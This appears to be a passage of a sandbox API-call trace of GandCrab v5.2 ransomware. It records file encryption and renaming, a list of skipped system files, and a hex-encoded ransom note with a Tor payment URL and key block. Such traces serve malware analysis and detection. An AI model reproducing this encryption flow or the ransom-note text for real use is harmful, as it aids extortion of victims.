(lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\8h2T0TOTp1FE793l0V5z.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\8h2t0totp1fe793l0v5z.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0095.199] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.199] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0095.199] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.200] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.200] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0095.200] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.200] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.200] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.200] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0095.200] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.201] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.201] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.201] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.201] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0095.201] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.201] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.202] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.202] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0095.202] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.202] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.202] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.202] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.202] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0095.202] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.203] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503578) returned 1 [0095.203] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.203] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0095.203] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.203] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0095.203] GetLastError () returned 0x0 [0095.208] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.208] CryptDestroyKey (hKey=0x503578) returned 1 [0095.208] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.209] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.209] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.209] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0095.209] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.209] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503938) returned 1 [0095.209] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.209] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0095.210] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.210] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0095.210] GetLastError () returned 0x0 [0095.210] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.210] CryptDestroyKey (hKey=0x503938) returned 1 [0095.210] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.210] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.210] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0095.210] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0095.211] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x1829d, lpOverlapped=0x0) returned 1 [0095.224] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffe7d63, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.224] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1829d, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x1829d, lpOverlapped=0x0) returned 1 [0095.225] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.226] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0095.227] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.230] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.231] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.231] CloseHandle (hObject=0x2ac) returned 1 [0095.232] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\8h2T0TOTp1FE793l0V5z.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\8h2t0totp1fe793l0v5z.mkv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\8h2T0TOTp1FE793l0V5z.mkv.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\8h2t0totp1fe793l0v5z.mkv.titwmvjl"), dwFlags=0x1) returned 1 [0095.232] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.232] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0095.232] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0095.233] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0095.233] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\d2ca4a09d2ca4deb61a.lock" [0095.233] lstrlenW (lpString=".titwmvjl") returned 9 [0095.233] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\d2ca4a09d2ca4deb61a.lock") returned 53 [0095.233] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.233] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 62 [0095.234] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\d2ca4a09d2ca4deb61a.lock") returned 53 [0095.234] lstrlenW (lpString=".lock") returned 5 [0095.234] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.234] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0095.234] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.234] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.235] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0095.235] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0095.235] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0095.235] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\desktop.ini" [0095.235] lstrlenW (lpString=".titwmvjl") returned 9 [0095.235] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\desktop.ini") returned 40 [0095.235] VirtualAlloc (lpAddress=0x0, dwSize=0x90, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.235] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\desktop.ini.titwmvjl") returned 49 [0095.235] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\desktop.ini") returned 40 [0095.235] lstrlenW (lpString=".ini") returned 4 [0095.235] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.236] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0095.236] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0095.236] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.236] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\desktop.ini") returned 40 [0095.236] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\desktop.ini") returned 40 [0095.236] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0095.236] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.236] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0095.236] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0095.236] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0095.236] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\TITWMVJL-DECRYPT.txt" [0095.236] lstrlenW (lpString=".titwmvjl") returned 9 [0095.236] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\TITWMVJL-DECRYPT.txt") returned 49 [0095.236] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.236] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 58 [0095.236] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\TITWMVJL-DECRYPT.txt") returned 49 [0095.236] lstrlenW (lpString=".txt") returned 4 [0095.236] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.237] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0095.237] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0095.237] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.237] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\TITWMVJL-DECRYPT.txt") returned 49 [0095.237] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\TITWMVJL-DECRYPT.txt") returned 49 [0095.237] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0095.237] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0095.237] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0095.237] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0095.237] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0095.237] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0095.237] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0095.237] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0095.237] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.237] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0095.237] lstrcmpW (lpString1="XszTLjK GHoiKt1rd", lpString2=".") returned 1 [0095.237] lstrcmpW (lpString1="XszTLjK GHoiKt1rd", lpString2="..") returned 1 [0095.237] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="XszTLjK GHoiKt1rd" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd" [0095.237] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\" [0095.237] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0095.238] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.238] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0095.238] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.238] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0095.238] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.238] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0095.238] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.238] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0095.238] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.238] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.239] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\\\TITWMVJL-DECRYPT.txt") returned 68 [0095.239] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0095.254] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\